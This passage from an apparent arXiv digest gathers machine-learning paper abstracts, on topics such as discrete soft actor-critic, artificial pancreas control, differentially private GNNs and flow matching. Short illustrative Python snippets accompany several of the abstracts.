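        history.append(0.5 * x * x)
    return x, history

# One 'long' step (h = 2.9 > 2/L) per cycle, followed by three short ones;
# per cycle |1 - h| factors multiply to 1.9 * 0.5^3 = 0.2375 < 1.
schedule = [2.9, 0.5, 0.5, 0.5] * 10
x, hist = gd(1.0, schedule)
print(hist[1] > hist[0])    # the long step increases f in the short term...
print(hist[-1] < 1e-6)      # ...yet the overall run converges
```

The per-cycle contraction factor 0.2375 is what "analyzing the overall effect of many iterations at once" captures, and what a one-iteration descent argument cannot.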
    Revisiting Discrete Soft Actor-Critic. (arXiv:2209.10081v3 [cs.LG] UPDATED)
    We study the adaptation of soft actor-critic (SAC) from continuous action spaces to discrete action spaces. We revisit vanilla SAC and provide an in-depth understanding of its Q value underestimation and performance instability issues when applied to discrete settings. We thereby propose entropy-penalty and double average Q-learning with Q-clip to address these issues. Extensive experiments on typical benchmarks with discrete action spaces, including Atari games and a large-scale MOBA game, show the efficacy of our proposed method. Our code is at: https://github.com/coldsummerday/Revisiting-Discrete-SAC.  ( 2 min )
    Personalized Anomaly Detection in PPG Data using Representation Learning and Biometric Identification. (arXiv:2307.06380v1 [cs.LG])
    Photoplethysmography (PPG) signals, typically acquired from wearable devices, hold significant potential for continuous fitness-health monitoring. In particular, heart conditions that manifest as rare and subtle deviations in heart patterns may be of interest. However, robust and reliable anomaly detection within these data remains a challenge due to the scarcity of labeled data and high inter-subject variability. This paper introduces a two-stage framework leveraging representation learning and personalization to improve anomaly detection performance in PPG data. The proposed framework first employs representation learning to transform the original PPG signals into a more discriminative and compact representation. We then apply three different unsupervised anomaly detection methods for movement detection and biometric identification. We validate our approach using two different datasets in both generalized and personalized scenarios. The results show that representation learning significantly improves anomaly detection performance while reducing the high inter-subject variability. Personalized models further enhance anomaly detection performance, underscoring the role of personalization in PPG-based fitness-health monitoring systems. The results from biometric identification show that it is easier to distinguish a new user from one intended authorized user than from a group of users. Overall, this study provides evidence of the effectiveness of representation learning and personalization for anomaly detection in PPG data.  ( 2 min )
    On the Connection between Game-Theoretic Feature Attributions and Counterfactual Explanations. (arXiv:2307.06941v1 [cs.AI])
    Explainable Artificial Intelligence (XAI) has received widespread interest in recent years, and two of the most popular types of explanations are feature attributions and counterfactual explanations. These classes of approaches have been largely studied independently, and the few attempts at reconciling them have been primarily empirical. This work establishes a clear theoretical connection between game-theoretic feature attributions, focusing on but not limited to SHAP, and counterfactual explanations. After motivating operative changes to Shapley-value-based feature attributions and counterfactual explanations, we prove that, under certain conditions, they are in fact equivalent. We then extend the equivalency result to game-theoretic solution concepts beyond Shapley values. Moreover, through the analysis of the conditions of such equivalence, we shed light on the limitations of naively using counterfactual explanations to provide feature importances. Experiments on three datasets quantitatively show the difference in explanations at every stage of the connection between the two approaches and corroborate the theoretical findings.
    Control Transformer: Robot Navigation in Unknown Environments through PRM-Guided Return-Conditioned Sequence Modeling. (arXiv:2211.06407v3 [cs.RO] UPDATED)
    Learning long-horizon tasks such as navigation has presented difficult challenges for successfully applying reinforcement learning to robotics. From another perspective, under known environments, sampling-based planning can robustly find collision-free paths in environments without learning. In this work, we propose Control Transformer that models return-conditioned sequences from low-level policies guided by a sampling-based Probabilistic Roadmap (PRM) planner. We demonstrate that our framework can solve long-horizon navigation tasks using only local information. We evaluate our approach on partially-observed maze navigation with MuJoCo robots, including Ant, Point, and Humanoid. We show that Control Transformer can successfully navigate through mazes and transfer to unknown environments. Additionally, we apply our method to a differential drive robot (Turtlebot3) and show zero-shot sim2real transfer under noisy observations.
    Hybrid Control Policy for Artificial Pancreas via Ensemble Deep Reinforcement Learning. (arXiv:2307.06501v1 [cs.AI])
    Objective: The artificial pancreas (AP) has shown promising potential in achieving closed-loop glucose control for individuals with type 1 diabetes mellitus (T1DM). However, designing an effective control policy for the AP remains challenging due to the complex physiological processes, delayed insulin response, and inaccurate glucose measurements. While model predictive control (MPC) offers safety and stability through the dynamic model and safety constraints, it lacks individualization and is adversely affected by unannounced meals. Conversely, deep reinforcement learning (DRL) provides personalized and adaptive strategies but faces challenges with distribution shifts and substantial data requirements. Methods: We propose a hybrid control policy for the artificial pancreas (HyCPAP) to address the above challenges. HyCPAP combines an MPC policy with an ensemble DRL policy, leveraging the strengths of both policies while compensating for their respective limitations. To facilitate faster deployment of AP systems in real-world settings, we further incorporate meta-learning techniques into HyCPAP, leveraging previous experience and patient-shared knowledge to enable fast adaptation to new patients with limited available data. Results: We conduct extensive experiments using the FDA-accepted UVA/Padova T1DM simulator across three scenarios. Our approaches achieve the highest percentage of time spent in the desired euglycemic range and the lowest occurrences of hypoglycemia. Conclusion: The results clearly demonstrate the superiority of our methods for closed-loop glucose management in individuals with T1DM. Significance: The study presents novel control policies for AP systems, affirming the great potential of proposed methods for efficient closed-loop glucose control.  ( 3 min )
    Learning IMM Filter Parameters from Measurements using Gradient Descent. (arXiv:2307.06618v1 [cs.LG])
    The performance of data fusion and tracking algorithms often depends on parameters that not only describe the sensor system, but can also be task-specific. While for the sensor system tuning these variables is time-consuming and mostly requires expert knowledge, intrinsic parameters of targets under track can even be completely unobservable until the system is deployed. With state-of-the-art sensor systems growing more and more complex, the number of parameters naturally increases, necessitating the automatic optimization of the model variables. In this paper, the parameters of an interacting multiple model (IMM) filter are optimized solely using measurements, thus without necessity for any ground-truth data. The resulting method is evaluated through an ablation study on simulated data, where the trained model manages to match the performance of a filter parametrized with ground-truth values.
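The abstract's core idea — tune filter parameters by gradient descent on measurement prediction error, with no ground truth — can be miniaturized. Below, a scalar exponential smoother's gain is tuned by finite-difference descent on the one-step-ahead squared error of simulated measurements; all constants are invented, and the paper's actual IMM machinery is far richer than this toy analogue.

```python
import random

def one_step_loss(alpha, zs):
    """Mean squared one-step prediction error of exponential smoothing with gain alpha."""
    est, loss, n = zs[0], 0.0, 0
    for z in zs[1:]:
        loss += (z - est) ** 2
        n += 1
        est = est + alpha * (z - est)   # innovation update
    return loss / n

# Simulated measurements: slowly drifting state plus heavy observation noise
random.seed(0)
truth, zs = 0.0, []
for _ in range(2000):
    truth += random.gauss(0, 0.05)
    zs.append(truth + random.gauss(0, 1.0))

# Finite-difference gradient descent on the measurement-only loss
alpha, lr, eps = 0.9, 0.05, 1e-4
for _ in range(200):
    g = (one_step_loss(alpha + eps, zs) - one_step_loss(alpha - eps, zs)) / (2 * eps)
    alpha = min(0.999, max(0.001, alpha - lr * g))
print(round(alpha, 3))   # settles near the small gain the noise ratio calls for
```

The recovered gain approaches the steady-state Kalman gain implied by the (unknown to the optimizer) process/measurement noise ratio, which is the sense in which measurements alone suffice.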
    Filling time-series gaps using image techniques: Multidimensional context autoencoder approach for building energy data imputation. (arXiv:2307.05926v2 [cs.LG] UPDATED)
    Building energy prediction and management has become increasingly important in recent decades, driven by the growth of Internet of Things (IoT) devices and the availability of more energy data. However, energy data is often collected from multiple sources and can be incomplete or inconsistent, which can hinder accurate prediction and management of energy systems and limit the usefulness of the data for decision-making and research. To address this issue, past studies have focused on imputing missing gaps in energy data, including random and continuous gaps. One of the main challenges in this area is the lack of validation on a benchmark dataset with various building and meter types, making it difficult to accurately evaluate the performance of different imputation methods. Another challenge is the lack of application of state-of-the-art imputation methods for missing gaps in energy data. Contemporary image-inpainting methods, such as Partial Convolution (PConv), have been widely used in the computer vision domain and have demonstrated their effectiveness in dealing with complex missing patterns. To study whether energy data imputation can benefit from image-based deep learning methods, this study compared PConv, Convolutional neural networks (CNNs), and the weekly persistence method using one of the biggest publicly available whole-building energy datasets, consisting of 1479 power meters worldwide, as the benchmark. The results show that, compared to the CNN on the raw time series (1D-CNN) and the weekly persistence method, neural network models with energy data reshaped into two dimensions reduced the Mean Squared Error (MSE) by 10% to 30%. The advanced deep learning method, Partial Convolution (PConv), further reduced the MSE by 20-30% compared to 2D-CNN and stands out among all models.
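The 2D reshaping the abstract credits with the 10-30% MSE reduction amounts to stacking the hourly series week by week (168 columns) so that daily and weekly periodicity align across rows, making the data image-like for CNN/PConv. A minimal sketch with stand-in data:

```python
def weekly_matrix(hourly, hours=24 * 7):
    """Reshape a flat hourly series into (weeks x 168) rows, dropping the remainder."""
    weeks = len(hourly) // hours
    return [hourly[w * hours:(w + 1) * hours] for w in range(weeks)]

series = list(range(1000))      # stand-in for one meter's hourly readings
mat = weekly_matrix(series)
print(len(mat), len(mat[0]))    # → 5 168
```

In this layout, a missing gap becomes a 2D "hole" with informative pixels above and below it (the same hour in adjacent weeks), which is exactly the structure inpainting methods exploit.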
    Efficient SGD Neural Network Training via Sublinear Activated Neuron Identification. (arXiv:2307.06565v1 [cs.LG])
    Deep learning has been widely used in many fields, but the model training process usually consumes massive computational resources and time. Therefore, designing an efficient neural network training method with a provable convergence guarantee is a fundamental and important research question. In this paper, we present a static half-space report data structure that consists of a fully connected two-layer neural network for shifted ReLU activation to enable activated neuron identification in sublinear time via geometric search. We also prove that our algorithm can converge in $O(M^2/\epsilon^2)$ time with network size quadratic in the coefficient norm upper bound $M$ and error term $\epsilon$.
    Balanced Coarsening for Multilevel Hypergraph Partitioning via Wasserstein Discrepancy. (arXiv:2106.07501v2 [cs.LG] UPDATED)
    We propose a balanced coarsening scheme for multilevel hypergraph partitioning. In addition, an initial partitioning algorithm is designed to improve the quality of k-way hypergraph partitioning. By assigning vertex weights through the LPT algorithm, we generate a prior hypergraph under a relaxed balance constraint. With the prior hypergraph, we define the Wasserstein discrepancy to coordinate the optimal transport of the coarsening process, and the optimal transport matrix is solved by the Sinkhorn algorithm. Our coarsening scheme fully takes into account the minimization of the connectivity metric (objective function). For the initial partitioning stage, we define a normalized cut function induced by the Fiedler vector, which is theoretically proved to be a concave function. Thereby, a three-point algorithm is designed to find the best cut under the balance constraint.
    EfficientNet Algorithm for Classification of Different Types of Cancer. (arXiv:2304.08715v3 [eess.IV] UPDATED)
    Accurate and efficient classification of different types of cancer is critical for early detection and effective treatment. In this paper, we present the results of our experiments using the EfficientNet algorithm for classification of brain tumor, breast cancer mammography, chest cancer, and skin cancer. We used publicly available datasets and preprocessed the images to ensure consistency and comparability. Our experiments show that the EfficientNet algorithm achieved high accuracy, precision, recall, and F1 scores on each of the cancer datasets, outperforming other state-of-the-art algorithms in the literature. We also discuss the strengths and weaknesses of the EfficientNet algorithm and its potential applications in clinical practice. Our results suggest that the EfficientNet algorithm is well-suited for classification of different types of cancer and can be used to improve the accuracy and efficiency of cancer diagnosis.
    Differentially Private Synthetic Data Generation via Lipschitz-Regularised Variational Autoencoders. (arXiv:2304.11336v2 [cs.LG] UPDATED)
    Synthetic data has been hailed as the silver bullet for privacy preserving data analysis. If a record is not real, then how could it violate a person's privacy? In addition, deep-learning based generative models are employed successfully to approximate complex high-dimensional distributions from data and draw realistic samples from this learned distribution. It is often overlooked though that generative models are prone to memorising many details of individual training records and often generate synthetic data that too closely resembles the underlying sensitive training data, hence violating strong privacy regulations as, e.g., encountered in health care. Differential privacy is the well-known state-of-the-art framework for guaranteeing protection of sensitive individuals' data, allowing aggregate statistics and even machine learning models to be released publicly without compromising privacy. The training mechanisms however often add too much noise during the training process, and thus severely compromise the utility of these private models. Even worse, the tight privacy budgets do not allow for many training epochs so that model quality cannot be properly controlled in practice. In this paper we explore an alternative approach for privately generating data that makes direct use of the inherent stochasticity in generative models, e.g., variational autoencoders. The main idea is to appropriately constrain the continuity modulus of the deep models instead of adding another noise mechanism on top. For this approach, we derive mathematically rigorous privacy guarantees and illustrate its effectiveness with practical experiments.
    Large Language Models for Supply Chain Optimization. (arXiv:2307.03875v2 [cs.AI] UPDATED)
    Supply chain operations traditionally involve a variety of complex decision making problems. Over the last few decades, supply chains greatly benefited from advances in computation, which allowed the transition from manual processing to automation and cost-effective optimization. Nonetheless, business operators still need to spend substantial efforts in explaining and interpreting the optimization outcomes to stakeholders. Motivated by the recent advances in Large Language Models (LLMs), we study how this disruptive technology can help bridge the gap between supply chain automation and human comprehension and trust thereof. We design OptiGuide -- a framework that accepts as input queries in plain text, and outputs insights about the underlying optimization outcomes. Our framework does not forgo the state-of-the-art combinatorial optimization technology, but rather leverages it to quantitatively answer what-if scenarios (e.g., how would the cost change if we used supplier B instead of supplier A for a given demand?). Importantly, our design does not require sending proprietary data over to LLMs, which can be a privacy concern in some circumstances. We demonstrate the effectiveness of our framework on a real server placement scenario within Microsoft's cloud supply chain. Along the way, we develop a general evaluation benchmark, which can be used to evaluate the accuracy of the LLM output in other scenarios.
    Data Augmentation in Training CNNs: Injecting Noise to Images. (arXiv:2307.06855v1 [cs.CV])
Noise injection is a fundamental tool for data augmentation, and yet there is no widely accepted procedure for incorporating it into learning frameworks. This study analyzes the effects of adding or applying different noise models of varying magnitudes to Convolutional Neural Network (CNN) architectures. Noise models that are distributed with different density functions are given common magnitude levels via the Structural Similarity (SSIM) metric in order to create an appropriate ground for comparison. The basic results conform with most of the common notions in machine learning, and also introduce some novel heuristics and recommendations on noise injection. The new approaches provide a better understanding of optimal learning procedures for image classification.
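Calibrating different noise models to a common magnitude level via SSIM can be sketched as follows; the single-window (global) SSIM and the bisection routine are simplifying assumptions, not the study's exact protocol:

```python
import numpy as np

def ssim_global(x, y, L=1.0):
    """Single-window (global) SSIM between two images with dynamic range L."""
    c1, c2 = (0.01 * L) ** 2, (0.03 * L) ** 2
    mx, my = x.mean(), y.mean()
    vx, vy = x.var(), y.var()
    cxy = ((x - mx) * (y - my)).mean()
    return ((2 * mx * my + c1) * (2 * cxy + c2)) / \
           ((mx ** 2 + my ** 2 + c1) * (vx + vy + c2))

def calibrate_gaussian_sigma(img, target_ssim, lo=0.0, hi=2.0, iters=40, seed=0):
    """Bisect the noise std so that img + sigma * eps hits a target SSIM.

    A fixed noise realization keeps the SSIM-vs-sigma curve deterministic
    and (approximately) monotone, so bisection applies."""
    eps = np.random.default_rng(seed).normal(size=img.shape)
    for _ in range(iters):
        mid = 0.5 * (lo + hi)
        if ssim_global(img, img + mid * eps) > target_ssim:
            lo = mid   # still too similar: increase the noise
        else:
            hi = mid
    return 0.5 * (lo + hi)

img = np.random.default_rng(1).random((64, 64))   # toy image in [0, 1]
sigma = calibrate_gaussian_sigma(img, target_ssim=0.6)
```

The same calibration loop can be reused for other noise families (salt-and-pepper, speckle) by swapping the perturbation inside the bisection, which is what makes the SSIM level a common ground for comparison.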
    Towards Safe Autonomous Driving Policies using a Neuro-Symbolic Deep Reinforcement Learning Approach. (arXiv:2307.01316v2 [cs.RO] UPDATED)
The dynamic nature of driving environments and the presence of diverse road users pose significant challenges for decision-making in autonomous driving. Deep reinforcement learning (DRL) has emerged as a popular approach to tackle this problem. However, the application of existing DRL solutions is mainly confined to simulated environments due to safety concerns, impeding their deployment in the real world. To overcome this limitation, this paper introduces a novel neuro-symbolic model-free DRL approach, called DRL with Symbolic Logics (DRLSL), which combines the strengths of DRL (learning from experience) and symbolic first-order logic (knowledge-driven reasoning) to enable safe learning in real-time interactions of autonomous driving within real environments. This innovative approach provides a means to learn autonomous driving policies by actively engaging with the physical environment while ensuring safety. We have implemented the DRLSL framework in autonomous driving using the highD dataset and demonstrated that our method successfully avoids unsafe actions during both the training and testing phases. Furthermore, our results indicate that DRLSL achieves faster convergence during training and exhibits better generalizability to new driving scenarios compared to traditional DRL methods.
    PIGEON: Predicting Image Geolocations. (arXiv:2307.05845v2 [cs.CV] UPDATED)
We introduce PIGEON, a multi-task end-to-end system for planet-scale image geolocalization that achieves state-of-the-art performance on both external benchmarks and in human evaluation. Our work incorporates semantic geocell creation with label smoothing, conducts pretraining of a vision transformer on images with geographic information, and refines location predictions with ProtoNets across a candidate set of geocells. The contributions of PIGEON are three-fold: first, we design a semantic geocell creation and splitting algorithm based on open-source data which can be adapted to any geospatial dataset. Second, we show the effectiveness of intra-geocell refinement and the applicability of unsupervised clustering and ProtoNets to the task. Finally, we make our pre-trained CLIP transformer model, StreetCLIP, publicly available for use in adjacent domains with applications to fighting climate change and urban and rural scene understanding.
    Differentially Private Decoupled Graph Convolutions for Multigranular Topology Protection. (arXiv:2307.06422v1 [cs.LG])
Graph learning methods, such as Graph Neural Networks (GNNs) based on graph convolutions, are highly successful in solving real-world learning problems involving graph-structured data. However, graph learning methods expose sensitive user information and interactions not only through their model parameters but also through their model predictions. Consequently, standard Differential Privacy (DP) techniques that merely offer model weight privacy are inadequate. This is especially the case for node predictions that leverage neighboring node attributes directly via graph convolutions that create additional risks of privacy leakage. To address this problem, we introduce Graph Differential Privacy (GDP), a new formal DP framework tailored to graph learning settings that ensures both provably private model parameters and predictions. Furthermore, since there may be different privacy requirements for the node attributes and graph structure, we introduce a novel notion of relaxed node-level data adjacency. This relaxation can be used for establishing guarantees for different degrees of graph topology privacy while maintaining node attribute privacy. Importantly, this relaxation reveals a useful trade-off between utility and topology privacy for graph learning methods. In addition, our analysis of GDP reveals that existing DP-GNNs fail to exploit this trade-off due to the complex interplay between graph topology and attribute data in standard graph convolution designs. To mitigate this problem, we introduce the Differentially Private Decoupled Graph Convolution (DPDGC) model, which benefits from decoupled graph convolution while providing GDP guarantees. Extensive experiments on seven node classification benchmarking datasets demonstrate the superior privacy-utility trade-off of DPDGC over existing DP-GNNs based on standard graph convolution design.
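The decoupling idea can be illustrated in a few lines: a standard GCN interleaves feature transformation with neighborhood aggregation at every layer, whereas a decoupled design transforms node attributes first and propagates over the topology afterwards. This is a hedged sketch of the design pattern DPDGC builds on, not the model itself (in particular, no DP noise is added here):

```python
import numpy as np

def norm_adj(A):
    """Symmetrically normalized adjacency with self-loops."""
    A = A + np.eye(len(A))
    d_inv_sqrt = np.diag(A.sum(axis=1) ** -0.5)
    return d_inv_sqrt @ A @ d_inv_sqrt

def coupled_gcn(A, X, W1, W2):
    """Standard two-layer GCN: transformation and propagation interleave,
    entangling node attributes with graph topology at every layer."""
    Ah = norm_adj(A)
    return Ah @ np.maximum(Ah @ X @ W1, 0.0) @ W2

def decoupled_gcn(A, X, W1, W2, k=2):
    """Decoupled design: an attribute-only MLP first, then k propagation
    steps that touch only the topology -- so the two privacy-sensitive
    components can be accounted for (and perturbed) separately."""
    H = np.maximum(X @ W1, 0.0) @ W2   # attribute-only transformation
    Ah = norm_adj(A)
    for _ in range(k):
        H = Ah @ H                     # topology-only propagation
    return H

rng = np.random.default_rng(0)
A = np.array([[0, 1, 0, 1],
              [1, 0, 1, 0],
              [0, 1, 0, 1],
              [1, 0, 1, 0]], dtype=float)      # a 4-cycle graph
X = rng.normal(size=(4, 3))
W1, W2 = rng.normal(size=(3, 8)), rng.normal(size=(8, 2))
```

Because attribute handling and topology handling are now separate stages, different privacy mechanisms (or adjacency relaxations) can be applied to each, which is the trade-off the abstract describes.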
    A Causal Framework to Unify Common Domain Generalization Approaches. (arXiv:2307.06825v1 [cs.LG])
    Domain generalization (DG) is about learning models that generalize well to new domains that are related to, but different from, the training domain(s). It is a fundamental problem in machine learning and has attracted much attention in recent years. A large number of approaches have been proposed. Different approaches are motivated from different perspectives, making it difficult to gain an overall understanding of the area. In this paper, we propose a causal framework for domain generalization and present an understanding of common DG approaches in the framework. Our work sheds new lights on the following questions: (1) What are the key ideas behind each DG method? (2) Why is it expected to improve generalization to new domains theoretically? (3) How are different DG methods related to each other and what are relative advantages and limitations? By providing a unified perspective on DG, we hope to help researchers better understand the underlying principles and develop more effective approaches for this critical problem in machine learning.
    Full-resolution Lung Nodule Segmentation from Chest X-ray Images using Residual Encoder-Decoder Networks. (arXiv:2307.06547v1 [eess.IV])
Lung cancer is the leading cause of cancer death and early diagnosis is associated with a positive prognosis. Chest X-ray (CXR) provides an inexpensive imaging mode for lung cancer diagnosis. Suspicious nodules are difficult to distinguish from vascular and bone structures using CXR. Computer vision has previously been proposed to assist human radiologists in this task; however, leading studies use down-sampled images and computationally expensive methods with unproven generalization. Instead, this study localizes lung nodules using efficient encoder-decoder neural networks that process full resolution images to avoid any signal loss resulting from down-sampling. Encoder-decoder networks are trained and tested using the JSRT lung nodule dataset. The networks are used to localize lung nodules from an independent external CXR dataset. Sensitivity and false positive rates are measured using an automated framework to eliminate any observer subjectivity. These experiments allow for the determination of the optimal network depth, image resolution and pre-processing pipeline for generalized lung nodule localization. We find that nodule localization is influenced by subtlety, with more subtle nodules being detected in earlier training epochs. Therefore, we propose a novel self-ensemble model from three consecutive epochs centered on the validation optimum. This ensemble achieved a sensitivity of 85% in 10-fold internal testing with false positives of 8 per image. A sensitivity of 81% is achieved at a false positive rate of 6 following morphological false positive reduction. This result is comparable to more computationally complex systems based on linear and spatial filtering, but with a sub-second inference time that is faster than other methods. The proposed algorithm achieved excellent generalization results against an external dataset with sensitivity of 77% at a false positive rate of 7.6.
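The self-ensemble over three consecutive epoch checkpoints amounts to averaging per-pixel probabilities before thresholding; a minimal sketch with hypothetical probability maps standing in for the checkpoint outputs:

```python
import numpy as np

def self_ensemble_mask(prob_maps, threshold=0.5):
    """Average per-pixel nodule probabilities from the checkpoints of three
    consecutive epochs (centered on the validation optimum), then threshold."""
    return np.mean(prob_maps, axis=0) >= threshold

# hypothetical probability maps from epochs k-1, k, k+1 for a 2x2 image
maps = np.array([
    [[0.9, 0.2], [0.4, 0.1]],
    [[0.8, 0.3], [0.6, 0.2]],
    [[0.7, 0.1], [0.8, 0.0]],
])
mask = self_ensemble_mask(maps)
```

Averaging across neighboring epochs is what lets the ensemble capture both the subtle nodules detected early in training and the more obvious ones detected later.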
    Parallel bootstrap-based on-policy deep reinforcement learning for continuous flow control applications. (arXiv:2304.12330v3 [cs.LG] UPDATED)
The coupling of deep reinforcement learning to numerical flow control problems has recently received considerable attention, leading to groundbreaking results and opening new perspectives for the domain. Due to the usually high computational cost of fluid dynamics solvers, the use of parallel environments during the learning process represents an essential ingredient to attain efficient control in a reasonable time. Yet, most of the deep reinforcement learning literature for flow control relies on on-policy algorithms, for which the massively parallel transition collection may break theoretical assumptions and lead to suboptimal control models. To overcome this issue, we propose a parallelism pattern relying on partial-trajectory buffers terminated by a return bootstrapping step, allowing a flexible use of parallel environments while preserving the on-policiness of the updates. This approach is illustrated on a CPU-intensive continuous flow control problem from the literature.
    On Collaboration in Distributed Parameter Estimation with Resource Constraints. (arXiv:2307.06442v1 [cs.LG])
We study sensor/agent data collection and collaboration policies for parameter estimation, accounting for resource constraints and correlation between observations collected by distinct sensors/agents. Specifically, we consider a group of sensors/agents, each of which samples from different variables of a multivariate Gaussian distribution and has a different estimation objective, and we formulate a sensor/agent's data collection and collaboration policy design problem as a Fisher information maximization (or Cramer-Rao bound minimization) problem. When knowledge of the correlation between variables is available, we analytically identify two particular scenarios: (1) where the knowledge of the correlation between samples cannot be leveraged for collaborative estimation purposes and (2) where the optimal data collection policy involves investing scarce resources to collaboratively sample and transfer information that is not of immediate interest and whose statistics are already known, with the sole goal of increasing the confidence on the estimate of the parameter of interest. When knowledge of certain correlations is unavailable but collaboration may still be worthwhile, we propose novel ways to apply multi-armed bandit algorithms to learn the optimal data collection and collaboration policy in our distributed parameter estimation problem and demonstrate that the proposed algorithms, DOUBLE-F, DOUBLE-Z, UCB-F, UCB-Z, are effective through simulations.
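For the simplest case of independent Gaussian sensors with known variances, minimizing the summed Cramer-Rao bound over a total sampling budget is a separable convex problem that greedy allocation solves exactly; a toy sketch of that baseline (the paper's setting with correlated variables and collaboration is richer than this):

```python
import numpy as np

def allocate_samples(sigmas, budget):
    """Greedily allocate a total sampling budget across independent Gaussian
    sensors to minimize the summed Cramer-Rao bound sum_i sigma_i^2 / n_i.

    The objective is separable and convex in n, so adding one sample at a
    time to the sensor with the largest marginal CRB reduction is optimal."""
    sigmas = np.asarray(sigmas, dtype=float)
    n = np.ones(len(sigmas), dtype=int)                  # one sample each to start
    for _ in range(budget - len(sigmas)):
        gain = sigmas ** 2 / n - sigmas ** 2 / (n + 1)   # marginal CRB reduction
        n[np.argmax(gain)] += 1
    return n
```

Noisier sensors receive proportionally more samples (a sensor with twice the standard deviation ends up with roughly twice the budget), matching the continuous optimum n_i proportional to sigma_i.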
    Efficient Task Offloading Algorithm for Digital Twin in Edge/Cloud Computing Environment. (arXiv:2307.05888v2 [cs.LG] UPDATED)
In the era of Internet of Things (IoT), Digital Twin (DT) is envisioned to empower various areas as a bridge between physical objects and the digital world. Through virtualization and simulation techniques, multiple functions can be achieved by leveraging computing resources. In this process, Mobile Cloud Computing (MCC) and Mobile Edge Computing (MEC) have become two of the key factors to achieve real-time feedback. However, current works consider only edge servers or cloud servers in their DT system models, and those models ignore DTs that draw on more than one data source. In this paper, we propose a new DT system model considering a heterogeneous MEC/MCC environment. Each DT in the model is maintained in one of the servers via multiple data collection devices. The offloading decision-making problem is also considered and a new offloading scheme is proposed based on Distributed Deep Learning (DDL). Simulation results demonstrate that our proposed algorithm can effectively and efficiently decrease the system's average latency and energy consumption. Significant improvement is achieved compared with the baselines under the dynamic environment of DTs.
    Aeolus Ocean -- A simulation environment for the autonomous COLREG-compliant navigation of Unmanned Surface Vehicles using Deep Reinforcement Learning and Maritime Object Detection. (arXiv:2307.06688v1 [cs.RO])
Progress towards navigational autonomy of unmanned surface vehicles (USVs) in the maritime sector can fundamentally lead to safer waters as well as reduced operating costs, while also providing a range of exciting new capabilities for oceanic research, exploration and monitoring. However, achieving such a goal is challenging. USV control systems must, safely and reliably, be able to adhere to the international regulations for preventing collisions at sea (COLREGs) in encounters with other vessels as they navigate to a given waypoint while being affected by realistic weather conditions, either during the day or at night. To deal with the multitude of possible scenarios, it is critical to have a virtual environment that is able to replicate the realistic operating conditions USVs will encounter, before they can be implemented in the real world. Such "digital twins" form the foundations upon which Deep Reinforcement Learning (DRL) and Computer Vision (CV) algorithms can be used to develop and guide USV control systems. In this paper we describe the novel development of a COLREG-compliant DRL-based collision-avoidance navigation system with CV-based awareness in a realistic ocean simulation environment. The performance of the trained autonomous agents resulting from this approach is evaluated in several successful navigations to set waypoints in both open sea and coastal encounters with other vessels. A binary executable version of the simulator with trained agents is available at https://github.com/aavek/Aeolus-Ocean
    RulE: Neural-Symbolic Knowledge Graph Reasoning with Rule Embedding. (arXiv:2210.14905v2 [cs.AI] UPDATED)
Knowledge graph (KG) reasoning is an important problem for knowledge graphs. In this paper, we propose a novel and principled framework called RulE (Rule Embedding) to effectively leverage logical rules to enhance KG reasoning. Unlike knowledge graph embedding (KGE) methods, RulE learns rule embeddings from existing triplets and first-order rules by jointly representing entities, relations and logical rules in a unified embedding space. Based on the learned rule embeddings, a confidence score can be calculated for each rule, reflecting its consistency with the observed triplets. This allows us to perform logical rule inference in a soft way, thus alleviating the brittleness of logic. On the other hand, RulE injects prior logical rule information into the embedding space, enriching and regularizing the entity/relation embeddings. This makes KGE alone perform better too. RulE is conceptually simple and empirically effective. We conduct extensive experiments to verify each component of RulE. Results on multiple benchmarks reveal that our model outperforms the majority of existing embedding-based and rule-based approaches.
    EPiC-GAN: Equivariant Point Cloud Generation for Particle Jets. (arXiv:2301.08128v3 [hep-ph] UPDATED)
With the vast data-collecting capabilities of current and future high-energy collider experiments, there is an increasing demand for computationally efficient simulations. Generative machine learning models enable fast event generation, yet so far these approaches are largely constrained to fixed data structures and rigid detector geometries. In this paper, we introduce EPiC-GAN - equivariant point cloud generative adversarial network - which can produce point clouds of variable multiplicity. This flexible framework is based on deep sets and is well suited for simulating sprays of particles called jets. The generator and discriminator utilize multiple EPiC layers with an interpretable global latent vector. Crucially, the EPiC layers do not rely on pairwise information sharing between particles, which leads to a significant speed-up over graph- and transformer-based approaches with more complex relation diagrams. We demonstrate that EPiC-GAN scales well to large particle multiplicities and achieves high generation fidelity on benchmark jet generation tasks.
    Improving and generalizing flow-based generative models with minibatch optimal transport. (arXiv:2302.00482v2 [cs.LG] UPDATED)
Continuous normalizing flows (CNFs) are an attractive generative modeling technique, but they have been held back by limitations in their simulation-based maximum likelihood training. We introduce the generalized conditional flow matching (CFM) technique, a family of simulation-free training objectives for CNFs. CFM features a stable regression objective like that used to train the stochastic flow in diffusion models but enjoys the efficient inference of deterministic flow models. In contrast to both diffusion models and prior CNF training algorithms, CFM does not require the source distribution to be Gaussian or require evaluation of its density. A variant of our objective is optimal transport CFM (OT-CFM), which creates simpler flows that are more stable to train and lead to faster inference, as evaluated in our experiments. Furthermore, OT-CFM is the first method to compute dynamic OT in a simulation-free way. Training CNFs with CFM improves results on a variety of conditional and unconditional generation tasks, such as inferring single cell dynamics, unsupervised image translation, and Schrödinger bridge inference.
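The core CFM regression can be written in a few lines: sample a time, interpolate between a source and a data point along the conditional path, and regress the model onto that path's constant velocity. A numpy sketch under a toy paired coupling (real training would sample an independent or minibatch-OT coupling and fit a neural network in place of the closures below):

```python
import numpy as np

def cfm_loss(model, x0, x1, t):
    """Conditional flow matching loss for a batch of (source, data) pairs.

    x_t interpolates linearly between x0 and x1 (the OT conditional path)
    and the regression target is that path's constant velocity x1 - x0."""
    t = t.reshape(-1, 1)
    xt = (1 - t) * x0 + t * x1   # point on the conditional path
    ut = x1 - x0                 # target conditional vector field
    return np.mean((model(xt, t) - ut) ** 2)

rng = np.random.default_rng(0)
x0 = rng.normal(size=(128, 2))           # source (Gaussian) samples
x1 = x0 + np.array([3.0, 0.0])           # toy paired "data": a constant shift
t = rng.uniform(size=128)

# under this coupling the true velocity field is the constant shift itself
perfect = lambda xt, t: np.broadcast_to(np.array([3.0, 0.0]), xt.shape)
```

No ODE is simulated at any point during training, which is exactly the "simulation-free" property: the path and its velocity are available in closed form.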
    A New Formalism, Method and Open Issues for Zero-Shot Coordination. (arXiv:2106.06613v3 [cs.AI] UPDATED)
